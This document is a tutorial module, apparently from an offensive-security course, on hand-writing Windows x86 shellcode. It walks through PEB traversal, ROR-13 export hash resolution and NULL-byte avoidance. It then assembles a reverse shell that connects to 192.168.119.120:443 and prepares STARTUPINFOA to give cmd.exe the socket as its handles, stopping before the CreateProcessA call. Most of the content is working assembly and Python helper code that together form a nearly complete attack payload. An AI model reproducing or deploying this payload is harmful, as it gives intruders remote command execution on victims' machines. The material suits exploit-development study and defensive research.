Creating Custom Shellcode

Table of Contents

  1. Introduction
  2. Calling Conventions on x86
  3. The System Call Problem
  4. Finding kernel32.dll
  5. Resolving Symbols
  6. NULL-Free Position-Independent Shellcode (PIC)
  7. Reverse Shell Implementation
  8. Conclusion

Introduction

In previous modules, various payloads were generated using the Metasploit Framework for exploits. This module focuses on understanding how shellcode works internally and developing custom reverse shells from scratch.

Shellcode is a set of CPU instructions designed to be executed after a vulnerability is successfully exploited. Originally, the term referred to exploit code used to spawn a root shell, but modern shellcode can perform much more complex operations including reverse shells, bind shells, and arbitrary code execution.

Key characteristics of shellcode:

  • Written in assembly language and assembled into machine-code bytes (opcodes), usually shown in hexadecimal
  • Can directly manipulate CPU registers and call operating system functions
  • Should run reliably across different Windows versions
  • Requires low-level operating system knowledge

Writing effective shellcode for Windows platforms is challenging due to the complexity of the operating system architecture and the need for portability across different versions.


Calling Conventions on x86

Overview

Calling conventions define the schema used to invoke function calls and are critical for shellcode developers. They specify:

  • How arguments are passed to functions
  • Which registers the callee must preserve for the caller
  • How the stack frame is prepared before the call
  • How the stack frame is restored after the call

Key Calling Conventions

__stdcall Convention:

  • Used by Win32 API functions
  • Parameters pushed to stack in reverse order
  • Stack cleaned up by the callee

__cdecl Convention:

  • Used by C runtime functions
  • Parameters pushed to stack in reverse order
  • Stack cleaned up by the caller
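Both conventions push arguments right to left. After CALL pushes the return address, the first argument therefore sits at [esp+4], the second at [esp+8], and so on. The two conventions differ only in who removes the arguments afterwards.

The sketch below models this with a toy 32-bit stack. The stack is a dictionary keyed by address, an assumption made purely for illustration; this is not an emulator.

```python
class Stack32:
    """Toy 32-bit stack: 4-byte slots, ESP grows downward."""

    def __init__(self, esp=0x1000):
        self.esp = esp
        self.mem = {}

    def push(self, value):
        self.esp -= 4
        self.mem[self.esp] = value & 0xFFFFFFFF

    def read(self, offset):
        return self.mem[self.esp + offset]


def call_with_args(stack, args, return_address=0x41414141):
    """Push args right to left, then the return address (as CALL does).
    Returns the arguments as the callee sees them at [esp+4], [esp+8], ..."""
    for arg in reversed(args):
        stack.push(arg)
    stack.push(return_address)
    return [stack.read(4 * (i + 1)) for i in range(len(args))]


def return_and_cleanup(stack, nargs, convention):
    """Model who removes the arguments once the callee returns."""
    if convention == "stdcall":
        stack.esp += 4 + 4 * nargs   # callee executes RET 4*nargs
    elif convention == "cdecl":
        stack.esp += 4               # callee executes a plain RET
        stack.esp += 4 * nargs       # caller executes ADD ESP, 4*nargs
    else:
        raise ValueError("unknown convention: " + convention)


stack = Stack32()
print(call_with_args(stack, [2, 1, 6]))   # [2, 1, 6]
return_and_cleanup(stack, 3, "stdcall")
print(hex(stack.esp))                     # 0x1000
```

The arguments [2, 1, 6] mirror the af, type and protocol values that WSASocketA receives later in this module. In both conventions ESP ends up where it started; only the responsible party changes.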

Register Volatility

On 32-bit systems, register handling follows specific rules:

Volatile Registers (can be clobbered):

  • EAX, EDX, ECX

Non-volatile Registers (must be preserved):

  • EBX, ESI, EDI, and EBP must be preserved by the callee (ESP must also be restored before returning)

Note: "Clobbered" refers to overwriting a CPU register's value during a function call without restoring it to the original value before returning.

graph TD
    A[Function Call] --> B{Calling Convention}
    B -->|__stdcall| C[Win32 API Functions]
    B -->|__cdecl| D[C Runtime Functions]
    C --> E[Callee cleans stack]
    D --> F[Caller cleans stack]
    E --> G[Parameters in reverse order]
    F --> G

The System Call Problem

System Calls Overview

System calls (syscalls) provide an interface between user space and the protected kernel, allowing access to low-level operating system functions for:

  • Input/Output operations
  • Thread synchronization
  • Socket management
  • Memory management

Windows Native API

The Windows Native API is equivalent to the system call interface on UNIX systems. Key characteristics:

  • Mostly undocumented interface exposed by ntdll.dll
  • Hidden behind higher-level APIs due to NT architecture
  • Supports multiple operating system APIs (Win32, OS/2, POSIX, DOS/Win16)
  • System call numbers change between Windows versions (unlike Linux)

The Challenge

Windows limitations for shellcode development:

  • Limited feature set in system call interface
  • No socket API via direct system calls
  • Need to use Windows API through Dynamic Link Libraries (DLLs)
  • Must avoid hard-coded function addresses for portability

Solution Strategy

flowchart LR
    A[Shellcode Needs] --> B[Avoid Direct Syscalls]
    B --> C[Use Windows API via DLLs]
    C --> D[Load/Locate DLLs in Memory]
    D --> E[Resolve Function Addresses]
    E --> F[Execute Required Functions]

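Essential functions for this process:

  • LoadLibraryA: loads a DLL into the process (if it is not already loaded) and returns its base address
  • GetModuleHandleA: returns the base address of a DLL that is already loaded
  • GetProcAddress: resolves the address of an exported function
  • All three are exported by kernel32.dll, which is loaded in almost every process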

Finding kernel32.dll

Why kernel32.dll?

kernel32.dll is the foundation for shellcode development because:

  • Contains LoadLibrary and GetProcAddress APIs
  • Required to load additional DLLs and resolve functions
  • Almost guaranteed to be loaded in process memory
  • Exports core APIs required for most processes

PEB Method

The most reliable technique for determining kernel32.dll base address involves parsing the Process Environment Block (PEB).

PEB Structure Analysis

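The PEB is allocated by the operating system for every running process. On 32-bit Windows it is reached through the Thread Environment Block (TEB): the FS segment register points to the current thread's TEB, and the TEB stores a pointer to the PEB at offset 0x30.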

graph TD
    A[FS Register] --> B[Thread Environment Block - TEB]
    B --> C[PEB Pointer at offset 0x30]
    C --> D[PEB Structure]
    D --> E[_PEB_LDR_DATA at offset 0x0C]
    E --> F[Three Linked Lists]
    F --> G[InLoadOrderModuleList]
    F --> H[InMemoryOrderModuleList]
    F --> I[InInitializationOrderModuleList]

Key Data Structures

_PEB_LDR_DATA Structure:

+0x00c InLoadOrderModuleList
+0x014 InMemoryOrderModuleList  
+0x01c InInitializationOrderModuleList

_LDR_DATA_TABLE_ENTRY Structure:

+0x000 InLoadOrderLinks
+0x008 InMemoryOrderLinks
+0x010 InInitializationOrderLinks
+0x018 DllBase (Base Address)
+0x01c EntryPoint
+0x020 SizeOfImage
+0x024 FullDllName (UNICODE_STRING)
+0x02c BaseDllName (UNICODE_STRING)
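The offsets used later in find_kernel32 ([esi+8h] and [esi+20h]) are relative to the InInitializationOrderLinks member, not to the start of the entry. A quick way to confirm them is to model the 32-bit layout with ctypes.

The sketch below makes two assumptions. Pointers are modeled as 4-byte integers, so the offsets match an x86 process even on a 64-bit host. The entry is truncated to the fields listed above.

```python
import ctypes


class LIST_ENTRY32(ctypes.Structure):
    _fields_ = [("Flink", ctypes.c_uint32), ("Blink", ctypes.c_uint32)]


class UNICODE_STRING32(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint16),
                ("MaximumLength", ctypes.c_uint16),
                ("Buffer", ctypes.c_uint32)]


class LDR_DATA_TABLE_ENTRY32(ctypes.Structure):
    # Truncated: only the members shown in the table above.
    _fields_ = [("InLoadOrderLinks", LIST_ENTRY32),
                ("InMemoryOrderLinks", LIST_ENTRY32),
                ("InInitializationOrderLinks", LIST_ENTRY32),
                ("DllBase", ctypes.c_uint32),
                ("EntryPoint", ctypes.c_uint32),
                ("SizeOfImage", ctypes.c_uint32),
                ("FullDllName", UNICODE_STRING32),
                ("BaseDllName", UNICODE_STRING32)]


E = LDR_DATA_TABLE_ENTRY32
# Flink pointers in InInitializationOrderModuleList point at this member.
link = E.InInitializationOrderLinks.offset                                  # 0x10
print(hex(E.DllBase.offset - link))                                         # 0x8
print(hex(E.BaseDllName.offset + UNICODE_STRING32.Buffer.offset - link))    # 0x20
```

The second value is the offset of BaseDllName.Buffer, which is why the assembly loads the module name pointer from [esi+20h].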

Implementation Process

The shellcode traverses the InInitializationOrderModuleList to find kernel32.dll:

  1. Access PEB through FS:[0x30]
  2. Navigate to _PEB_LDR_DATA structure
  3. Iterate through InInitializationOrderModuleList
  4. Identify kernel32.dll by its name length (12 Unicode characters, the length of "kernel32.dll")
  5. Extract base address from DllBase field

Assembling the Shellcode

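The shellcode is assembled from Python with the Keystone Engine, and ctypes is used to call Windows APIs from the same script:

Python Setup Code:

import ctypes, struct
from keystone import Ks, KS_ARCH_X86, KS_MODE_32

# CODE holds the assembly listing as one string (only the first lines shown).
# Keystone accepts ';' as a statement separator, so comments are omitted.
CODE = (
    " start:              "
    "   int3             ;"
    "   mov ebp, esp     ;"
    "   sub esp, 0x60    ;"
)

# Initialize Keystone engine in 32-bit mode
ks = Ks(KS_ARCH_X86, KS_MODE_32)

# Assemble: returns the encoded bytes (list of ints) and the statement count
encoding, count = ks.asm(CODE)
shellcode = bytearray(encoding)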

Core Assembly Implementation:

start:
    int3                        ; Breakpoint for debugging
    mov ebp, esp               ; Set up stack frame
    sub esp, 60h               ; Allocate stack space

find_kernel32:
    xor ecx, ecx               ; ECX = 0
    mov esi, fs:[ecx+30h]      ; ESI = &(PEB) 
    mov esi, [esi+0Ch]         ; ESI = PEB->Ldr
    mov esi, [esi+1Ch]         ; ESI = PEB->Ldr.InInitOrder

next_module:
    mov ebx, [esi+8h]          ; EBX = InInitOrder[X].base_address
    mov edi, [esi+20h]         ; EDI = InInitOrder[X].module_name  
    mov esi, [esi]             ; ESI = InInitOrder[X].flink (next)
    cmp [edi+12*2], cx         ; Check if modulename[12] == 0x00
    jne next_module            ; No: try next module

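The loop does not compare module names. Instead, it stops at the first module whose base name is exactly 12 Unicode characters long, the length of "kernel32.dll". Modules initialized earlier, such as ntdll.dll and (on newer Windows versions) KERNELBASE.dll, have different name lengths, so the check typically lands on kernel32.dll. It remains a heuristic: the cmp reads the character at index 12, which for a shorter name lies past its terminator.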
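The selection logic of next_module can be modeled in a few lines of Python. The sketch below makes two simplifying assumptions. First, the assembly's "character 12 is NUL" test is treated as an exact length check. Second, the module list, its order, and the base addresses are hypothetical values for illustration only.

```python
def find_kernel32(init_order):
    """Mimic the next_module loop: return (name, base) for the first module
    whose base name is exactly 12 characters long, or None if none matches."""
    for base_name, dll_base in init_order:
        # Simplification: the assembly checks that UTF-16 character 12 is NUL.
        if len(base_name) == 12:
            return base_name, dll_base
    return None


# Hypothetical InInitializationOrderModuleList contents.
modules = [
    ("ntdll.dll", 0x77A00000),
    ("KERNELBASE.dll", 0x76E00000),
    ("KERNEL32.DLL", 0x75F00000),
    ("ucrtbase.dll", 0x75000000),
]
name, base = find_kernel32(modules)
print(name, hex(base))   # KERNEL32.DLL 0x75f00000
```

Because the check ignores letter case and content, any 12-character name would also match. ucrtbase.dll is one such name, so the result depends on kernel32.dll appearing earlier in the list.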


Resolving Symbols

Export Directory Table

Once kernel32.dll base address is obtained, the next step is resolving exported function addresses. This is accomplished by traversing the Export Address Table (EAT) instead of relying on GetProcAddress.

Export Directory Table Structure

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD Characteristics;
    DWORD TimeDateStamp;
    WORD  MajorVersion;
    WORD  MinorVersion;
    DWORD Name;
    DWORD Base;
    DWORD NumberOfFunctions;
    DWORD NumberOfNames;
    DWORD AddressOfFunctions;      // RVA of function addresses array
    DWORD AddressOfNames;          // RVA of function names array  
    DWORD AddressOfNameOrdinals;   // RVA of ordinals array
} IMAGE_EXPORT_DIRECTORY;
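The assembly that follows reads this structure through raw offsets (18h, 1Ch, 20h, 24h). A ctypes mirror of the declaration makes those offsets explicit; every field is a fixed-size integer, so the layout is the same on 32-bit and 64-bit hosts:

```python
import ctypes


class IMAGE_EXPORT_DIRECTORY(ctypes.Structure):
    _fields_ = [("Characteristics", ctypes.c_uint32),
                ("TimeDateStamp", ctypes.c_uint32),
                ("MajorVersion", ctypes.c_uint16),
                ("MinorVersion", ctypes.c_uint16),
                ("Name", ctypes.c_uint32),
                ("Base", ctypes.c_uint32),
                ("NumberOfFunctions", ctypes.c_uint32),
                ("NumberOfNames", ctypes.c_uint32),
                ("AddressOfFunctions", ctypes.c_uint32),
                ("AddressOfNames", ctypes.c_uint32),
                ("AddressOfNameOrdinals", ctypes.c_uint32)]


# Print each field's offset, e.g. "NumberOfNames          +0x18"
for field, *_ in IMAGE_EXPORT_DIRECTORY._fields_:
    offset = getattr(IMAGE_EXPORT_DIRECTORY, field).offset
    print(f"{field:<22} +0x{offset:02x}")
```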

Three Critical Arrays

graph LR
    A[AddressOfNames Array] --> B[Function Names]
    C[AddressOfNameOrdinals Array] --> D[Ordinal Values]
    E[AddressOfFunctions Array] --> F[Function RVAs]
    
    B --> G[Index i]
    G --> D
    D --> H[New Index j]
    H --> F
    F --> I[Function VMA = RVA + DLL Base]

Working with the Export Names Array

The symbol resolution process follows these steps:

  1. Locate Export Directory Table:

    mov eax, [ebx+3Ch]          ; Offset to PE Signature
    mov edi, [ebx+eax+78h]      ; Export Table Directory RVA
    add edi, ebx                ; Export Table Directory VMA
  2. Access Arrays:

    mov ecx, [edi+18h]          ; NumberOfNames
    mov eax, [edi+20h]          ; AddressOfNames RVA
    add eax, ebx                ; AddressOfNames VMA
    mov [ebp-4], eax            ; Save AddressOfNames VMA
  3. Iterate Through Names:

    find_function_loop:
        jecxz find_function_finished    ; Jump if ECX is 0
        dec ecx                         ; Decrement counter
        mov eax, [ebp-4]               ; Restore AddressOfNames VMA
        mov esi, [eax+ecx*4]           ; Get RVA of symbol name
        add esi, ebx                   ; Set ESI to VMA of symbol name

Computing Function Name Hashes

To optimize shellcode size and enable reusable symbol resolution, a hashing algorithm converts function names to 4-byte hashes.

Hashing Algorithm

compute_hash:
    xor eax, eax               ; NULL EAX
    cdq                        ; NULL EDX  
    cld                        ; Clear direction flag

compute_hash_again:
    lodsb                      ; Load next byte from ESI into AL
    test al, al                ; Check for NULL terminator
    jz compute_hash_finished   ; Jump if NULL terminator found
    ror edx, 0Dh               ; Rotate EDX 13 bits right
    add edx, eax               ; Add byte to accumulator
    jmp compute_hash_again     ; Next iteration

compute_hash_finished:
    ; EDX now contains unique 4-byte hash

Python Hash Generator

#!/usr/bin/env python3
import sys

def ror32(value, count):
    """Rotate a 32-bit value right by count bits (like ror edx, count)."""
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def compute_hash(function_name):
    """Mirror compute_hash: for each byte, ror edx, 0Dh, then add edx, eax."""
    edx = 0x00
    for ch in function_name.encode("ascii"):
        edx = ror32(edx, 0x0D)
        edx = (edx + ch) & 0xFFFFFFFF   # keep the sum in 32 bits, like EDX
    return edx

if __name__ == "__main__":
    print(hex(compute_hash(sys.argv[1])))

# Example usage:
# python ComputeHash.py TerminateProcess
# Output: 0x78b5b983

Fetching the VMA of a Function

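Once the correct hash is found, retrieve the function's Virtual Memory Address. The stack offsets assume find_function begins with PUSHAD. The eight saved registers occupy 0x20 bytes and the return address another 4, so the target hash argument is at [esp+24h]. [esp+1Ch] is the slot where PUSHAD saved EAX; storing the address there makes the closing POPAD return it in EAX.

find_function_compare:
    cmp edx, [esp+24h]          ; Compare computed hash with the target hash argument
    jnz find_function_loop      ; If no match, try next function
    
    ; Hash matches - get function address
    mov edx, [edi+24h]          ; AddressOfNameOrdinals RVA
    add edx, ebx                ; AddressOfNameOrdinals VMA
    mov cx, [edx+2*ecx]         ; Get function's ordinal (index into AddressOfFunctions)
    mov edx, [edi+1Ch]          ; AddressOfFunctions RVA  
    add edx, ebx                ; AddressOfFunctions VMA
    mov eax, [edx+4*ecx]        ; Get function RVA
    add eax, ebx                ; Get function VMA
    mov [esp+1Ch], eax          ; Overwrite saved EAX so POPAD returns the VMA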
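The complete lookup (names array, then ordinals array, then functions array) can be reproduced in Python to check a hash before assembling. The sketch below has the following assumptions and limits:

  • `image` is a module as laid out in memory, so an RVA is simply an offset into the buffer.
  • It returns the function RVA; the caller would add the module base to obtain the VMA.
  • It does not handle forwarded exports.

```python
import struct


def ror13_hash(name):
    """ROR-13 additive hash over the bytes of `name` (as in compute_hash)."""
    h = 0
    for ch in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF   # ror h, 13
        h = (h + ch) & 0xFFFFFFFF                  # add h, byte
    return h


def read_cstring(image, offset):
    """Return the NUL-terminated byte string starting at `offset`."""
    return image[offset:image.index(b"\x00", offset)]


def find_export(image, target_hash):
    """Return the RVA of the export whose name hash matches, or None."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    export_rva = struct.unpack_from("<I", image, e_lfanew + 0x78)[0]
    # NumberOfNames, AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals
    num_names, funcs_rva, names_rva, ords_rva = struct.unpack_from(
        "<4I", image, export_rva + 0x18)

    for i in reversed(range(num_names)):           # the assembly also counts down
        name_rva = struct.unpack_from("<I", image, names_rva + 4 * i)[0]
        if ror13_hash(read_cstring(image, name_rva)) != target_hash:
            continue
        ordinal = struct.unpack_from("<H", image, ords_rva + 2 * i)[0]
        return struct.unpack_from("<I", image, funcs_rva + 4 * ordinal)[0]
    return None
```

A PE file read from disk uses file offsets that differ from RVAs, so it would need section-based address translation before being passed to this function.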

Symbol Resolution Flow:

sequenceDiagram
    participant SC as Shellcode
    participant EDT as Export Directory Table
    participant AN as AddressOfNames
    participant ANO as AddressOfNameOrdinals  
    participant AF as AddressOfFunctions
    
    SC->>EDT: Access Export Directory
    EDT->>AN: Get AddressOfNames array
    SC->>AN: Iterate through function names
    AN->>SC: Return function name
    SC->>SC: Compute hash of name
    SC->>SC: Compare with target hash
    alt Hash matches
        SC->>ANO: Get ordinal using same index
        ANO->>SC: Return ordinal value
        SC->>AF: Use ordinal as index
        AF->>SC: Return function RVA
        SC->>SC: Add DLL base to get VMA
    else Hash doesn't match
        SC->>AN: Try next function name
    end

NULL-Free Position-Independent Shellcode (PIC)

Avoiding NULL Bytes

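NULL bytes (0x00) are problematic in shellcode because vulnerable applications often copy input with string functions (such as strcpy) that stop at the first NULL byte, truncating the payload. Several techniques eliminate NULL bytes:

Technique 1: Arithmetic Operations

Instead of:

sub esp, 200h    ; Encodes as 81 EC 00 02 00 00 (contains NULL bytes)

Use:

add esp, 0xFFFFFDF0    ; ESP -= 210h; encodes as 81 C4 F0 FD FF FF (no NULL bytes)

Adding a negative immediate moves ESP down without NULL bytes. Note that 0xFFFFFDF0 is -0x210, so this reserves slightly more than 0x200 bytes; the exact value, 0xFFFFFE00, would still encode a NULL byte.

Technique 2: Instruction Replacement

Replace instructions whose encoding contains NULL bytes. A common case is a CALL to a label a short distance ahead. Its 32-bit relative offset is a small positive number padded with zero bytes, whereas a backward CALL uses a negative offset padded with 0xFF bytes:

call forward_label     ; E8 xx 00 00 00 (small positive offset, NULL bytes)
call backward_label    ; E8 xx FF FF FF (negative offset, normally no NULL bytes)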
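Checking assembled output for bad characters is easy to automate. The following is a minimal sketch that reports the offset of every forbidden byte. The encodings of the Technique 1 instructions are written out by hand here; in practice `bytes(encoding)` from Keystone could be passed instead. The default bad-character set (NULL only) is an assumption, since real targets may reject other bytes too.

```python
def find_bad_bytes(shellcode, bad=b"\x00"):
    """Return (offset, byte) pairs for every byte of `shellcode` found in `bad`."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


sub_esp = bytes.fromhex("81ec00020000")   # sub esp, 200h
add_esp = bytes.fromhex("81c4f0fdffff")   # add esp, 0FFFFFDF0h

print(find_bad_bytes(sub_esp))   # [(2, 0), (4, 0), (5, 0)]
print(find_bad_bytes(add_esp))   # []
```

Passing a larger set, for example `b"\x00\x0a\x0d"`, covers targets that also stop at line-ending characters.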

Position-Independent Shellcode

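Position-independent code (PIC) executes correctly regardless of where it is placed in memory, because it discovers the addresses it needs at runtime instead of hard-coding them. The JMP/CALL/POP sequence below, for example, obtains an absolute address without embedding one in the code: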

Dynamic Address Resolution

find_function_shorten:
    jmp find_function_shorten_bnc    ; Short jump forward to the CALL

find_function_ret:
    pop esi                          ; ESI = return address pushed by the CALL
    mov [ebp+04h], esi              ; Save address of the code following the CALL
    jmp resolve_symbols_kernel32

find_function_shorten_bnc:
    call find_function_ret           ; Backward CALL: negative offset, no NULL bytes

PIC Implementation Flow:

graph TD
    A[Shellcode Entry] --> B[Short Jump Forward]
    B --> C[Call Backward] 
    C --> D[Push Return Address]
    D --> E[Pop Address into Register]
    E --> F[Calculate Relative Offsets]
    F --> G[Execute Position-Independent Code]

This technique exploits the fact that:

  • CALL instruction pushes return address onto stack
  • POP retrieves this address for relative calculations
  • Negative offsets typically avoid NULL bytes
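The effect of the CALL direction can be checked by encoding the 5-byte `E8 rel32` form by hand. The addresses below are arbitrary example values. The relative offset is measured from the end of the CALL instruction.

```python
import struct


def encode_call_rel32(src, dst):
    """Encode `call dst` placed at address `src` as E8 + signed rel32,
    where rel32 is relative to the end of the 5-byte instruction."""
    return b"\xe8" + struct.pack("<i", dst - (src + 5))


forward = encode_call_rel32(0x100, 0x120)    # target 0x20 bytes ahead
backward = encode_call_rel32(0x120, 0x100)   # target 0x20 bytes behind

print(forward.hex())    # e81b000000
print(backward.hex())   # e8dbffffff
```

This is why the sequence above jumps forward first (a 2-byte short JMP) and then calls backward.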

Reverse Shell Implementation

Loading ws2_32.dll and Resolving Symbols

To create a reverse shell, the shellcode must load the Winsock library and resolve networking functions.

Required APIs

From kernel32.dll:

  • CreateProcessA (hash: 0x16b3fe72)
  • LoadLibraryA (hash: 0xec0e4e8e)
  • TerminateProcess (hash: 0x78b5b983)

From ws2_32.dll:

  • WSAStartup (hash: 0x3bfcedcb)
  • WSASocketA (hash: 0xadf509d9)
  • WSAConnect (hash: 0xb32dba0c)
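A single wrong hash makes find_function walk the whole export table without finding a match. Regenerating the list is therefore safer than copying it. The sketch below recomputes all six values with the same ROR-13 algorithm as compute_hash, assuming plain ASCII export names:

```python
def ror32(value, count):
    """Rotate a 32-bit value right by `count` bits (ror edx, count)."""
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name):
    """Same algorithm as compute_hash: ror 13, then add each byte."""
    h = 0
    for ch in name.encode("ascii"):
        h = (ror32(h, 13) + ch) & 0xFFFFFFFF
    return h


REQUIRED = ["CreateProcessA", "LoadLibraryA", "TerminateProcess",
            "WSAStartup", "WSASocketA", "WSAConnect"]

for api in REQUIRED:
    print(f"{api:<18} 0x{ror13_hash(api):08x}")
```

Similar names produce unrelated hashes. For instance, the plain connect export of ws2_32.dll hashes to 0x60aaf9ec, which differs from the WSAConnect hash.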

Loading ws2_32.dll

load_ws2_32:
    xor eax, eax               ; NULL EAX
    mov ax, 6C6Ch              ; Move end of string "ll"
    push eax                   ; Push with NULL terminator
    push 642E3233h             ; Push "32.d"
    push 5F327377h             ; Push "ws2_"
    push esp                   ; Push pointer to string
    call dword ptr [ebp+14h]   ; Call LoadLibraryA
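Stack strings like "ws2_32.dll" are built by splitting the NUL-terminated string into little-endian DWORDs and pushing them last chunk first. The helper below computes those values and flags any that contain NULL bytes. A flagged value, such as the "ll" chunk, has to be built indirectly, which load_ws2_32 does with xor eax, eax followed by mov ax, 6C6Ch. The helper assumes an ASCII string.

```python
import struct


def stack_string_pushes(text):
    """Split a NUL-terminated ASCII string into little-endian DWORDs,
    returned in push order (last chunk first), padded with NUL bytes."""
    data = text.encode("ascii") + b"\x00"
    data += b"\x00" * (-len(data) % 4)
    dwords = [struct.unpack_from("<I", data, i)[0] for i in range(0, len(data), 4)]
    return list(reversed(dwords))


for value in stack_string_pushes("ws2_32.dll"):
    note = "  <- contains NULL bytes" if b"\x00" in struct.pack("<I", value) else ""
    print(f"push 0x{value:08X}{note}")
# push 0x00006C6C  <- contains NULL bytes
# push 0x642E3233
# push 0x5F327377
```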

resolve_symbols_ws2_32:
    mov ebx, eax               ; Move ws2_32.dll base to EBX
    ; Now resolve individual functions using find_function

Calling WSAStartup

WSAStartup initializes the Winsock DLL for use by the shellcode.

Function Prototype

int WSAStartup(
    WORD wVersionRequired,      // Version 2.2 (0x0202)
    LPWSADATA lpWSAData        // Pointer to WSADATA structure
);

WSADATA Structure

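The WSADATA structure is 400 bytes (0x190) on 32-bit Windows. The code points lpWSAData 0x590 bytes below the current ESP, well away from the data the shellcode has already pushed:

call_wsastartup:
    mov eax, esp               ; Current stack pointer
    xor ecx, ecx               ; Clear ECX so its upper 16 bits are zero
    mov cx, 590h               ; Offset below ESP (larger than WSADATA)
    sub eax, ecx               ; EAX = ESP - 590h
    push eax                   ; Push lpWSAData pointer
    xor eax, eax               ; NULL EAX
    mov ax, 202h               ; Version 2.2
    push eax                   ; Push wVersionRequired
    call dword ptr [ebp+1Ch]   ; Call WSAStartup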
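The 400-byte figure can be checked by mirroring the structure with ctypes. This sketch assumes the 32-bit field order from winsock2.h; the 64-bit header orders the fields differently. The lpVendorInfo pointer is modeled as a 4-byte integer so the result matches x86 on any host.

```python
import ctypes


class WSADATA32(ctypes.Structure):
    """32-bit WSADATA layout; lpVendorInfo modeled as a 4-byte integer."""
    _fields_ = [("wVersion", ctypes.c_uint16),
                ("wHighVersion", ctypes.c_uint16),
                ("szDescription", ctypes.c_char * 257),   # WSADESCRIPTION_LEN + 1
                ("szSystemStatus", ctypes.c_char * 129),  # WSASYS_STATUS_LEN + 1
                ("iMaxSockets", ctypes.c_uint16),
                ("iMaxUdpDg", ctypes.c_uint16),
                ("lpVendorInfo", ctypes.c_uint32)]


print(hex(ctypes.sizeof(WSADATA32)))   # 0x190
```

The two bytes of padding before lpVendorInfo (needed for 4-byte alignment) explain why a field-by-field sum gives 398 rather than 400.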

Calling WSASocket

Creates a socket for network communication.

Function Prototype

SOCKET WSASocketA(
    int af,                    // Address family (AF_INET = 2)
    int type,                  // Socket type (SOCK_STREAM = 1)  
    int protocol,              // Protocol (IPPROTO_TCP = 6)
    LPWSAPROTOCOL_INFOA lpProtocolInfo,  // NULL
    GROUP g,                   // 0
    DWORD dwFlags              // 0
);

Implementation

call_wsasocketa:
    xor eax, eax               ; NULL EAX
    push eax                   ; Push dwFlags (NULL)
    push eax                   ; Push g (NULL)  
    push eax                   ; Push lpProtocolInfo (NULL)
    mov al, 06h                ; IPPROTO_TCP
    push eax                   ; Push protocol
    sub al, 05h                ; AL = 1 (SOCK_STREAM)
    push eax                   ; Push type
    inc eax                    ; EAX = 2 (AF_INET)
    push eax                   ; Push af
    call dword ptr [ebp+20h]   ; Call WSASocketA

Calling WSAConnect

Establishes connection to the target system.

sockaddr_in Structure Setup

typedef struct sockaddr_in {
    short sin_family;          // AF_INET (2)
    USHORT sin_port;          // Port number (443 = 0x01BB)
    IN_ADDR sin_addr;         // IP address (192.168.119.120)
    CHAR sin_zero[8];         // Reserved (NULL)
} SOCKADDR_IN;

Implementation

call_wsaconnect:
    mov esi, eax               ; Save socket descriptor
    xor eax, eax               ; NULL EAX
    push eax                   ; Push sin_zero[4-7]
    push eax                   ; Push sin_zero[0-3]  
    push 7877a8c0h             ; Push sin_addr (192.168.119.120 reversed)
    mov ax, 0bb01h             ; Port 443 in network byte order
    shl eax, 10h               ; Shift to upper 16 bits
    add ax, 02h                ; Add AF_INET
    push eax                   ; Push sin_port & sin_family
    
    ; Get pointer to structure
    push esp                   ; Push pointer to sockaddr_in
    pop edi                    ; Store in EDI
    
    ; Set up remaining parameters
    xor eax, eax               ; NULL EAX
    push eax                   ; Push lpGQOS (NULL)
    push eax                   ; Push lpSQOS (NULL)
    push eax                   ; Push lpCalleeData (NULL)
    push eax                   ; Push lpCallerData (NULL)
    add al, 10h                ; namelen = 16
    push eax                   ; Push namelen
    push edi                   ; Push *name (sockaddr_in)
    push esi                   ; Push socket descriptor
    call dword ptr [ebp+24h]   ; Call WSAConnect
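The four DWORDs pushed for sockaddr_in can be derived with the struct module. The following is a minimal sketch using the document's example address and port. It assumes AF_INET is 2 (the Winsock value) and stores sin_family in x86 little-endian order, sin_port in network byte order, and sin_addr as returned by inet_aton.

```python
import socket
import struct

AF_INET = 2  # Winsock value for IPv4


def sockaddr_in(ip, port):
    """Build the 16-byte sockaddr_in layout used by WSAConnect."""
    return (struct.pack("<H", AF_INET)     # sin_family, little-endian on x86
            + struct.pack(">H", port)      # sin_port, network byte order
            + socket.inet_aton(ip)         # sin_addr, already network order
            + b"\x00" * 8)                 # sin_zero


raw = sockaddr_in("192.168.119.120", 443)
# The shellcode pushes the structure as four DWORDs, last one first.
for value in reversed(struct.unpack("<4I", raw)):
    print(f"push 0x{value:08x}")
# push 0x00000000
# push 0x00000000
# push 0x7877a8c0
# push 0xbb010002
```

The last value, 0xbb010002, is what call_wsaconnect builds in EAX with mov ax, 0bb01h, shl eax, 10h and add ax, 02h.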

Calling CreateProcessA

Creates the cmd.exe process with redirected I/O handles.

Function Prototype

BOOL CreateProcessA(
    LPCSTR lpApplicationName,           // NULL
    LPSTR lpCommandLine,               // "cmd.exe"
    LPSECURITY_ATTRIBUTES lpProcessAttributes,    // NULL
    LPSECURITY_ATTRIBUTES lpThreadAttributes,     // NULL
    BOOL bInheritHandles,              // TRUE
    DWORD dwCreationFlags,             // 0
    LPVOID lpEnvironment,              // NULL
    LPCSTR lpCurrentDirectory,         // NULL
    LPSTARTUPINFOA lpStartupInfo,      // Configured structure
    LPPROCESS_INFORMATION lpProcessInformation    // Output structure
);

STARTUPINFOA Structure Setup

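The STARTUPINFOA structure (68 bytes, 0x44) redirects the child process's standard I/O when two conditions hold: dwFlags contains STARTF_USESTDHANDLES (0x100), and hStdInput, hStdOutput, and hStdError hold the socket handle. Because the stack grows downward, the fields are pushed from last (hStdError) to first (cb):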

create_startupinfoa:
    push esi                   ; hStdError (socket)
    push esi                   ; hStdOutput (socket)  
    push esi                   ; hStdInput (socket)
    xor eax, eax               ; NULL EAX
    push eax                   ; lpReserved2 (NULL)
    push eax                   ; cbReserved2 & wShowWindow (NULL)
    mov al, 80h                ; AL = 80h (half of 100h)
    xor ecx, ecx               ; NULL ECX
    mov cl, 80h                ; ECX = 80h ("mov cx, 80h" would encode a NULL byte)
    add eax, ecx               ; EAX = 100h (STARTF_USESTDHANDLES)
    push eax                   ; dwFlags
    
    ; Push remaining NULL fields
    xor eax, eax
    push eax                   ; dwFillAttribute
    push eax                   ; dwYCountChars
    push eax                   ; dwXCountChars  
    push eax                   ; dwYSize
    push eax                   ; dwXSize
    push eax                   ; dwY
    push eax                   ; dwX
    push eax                   ; lpTitle
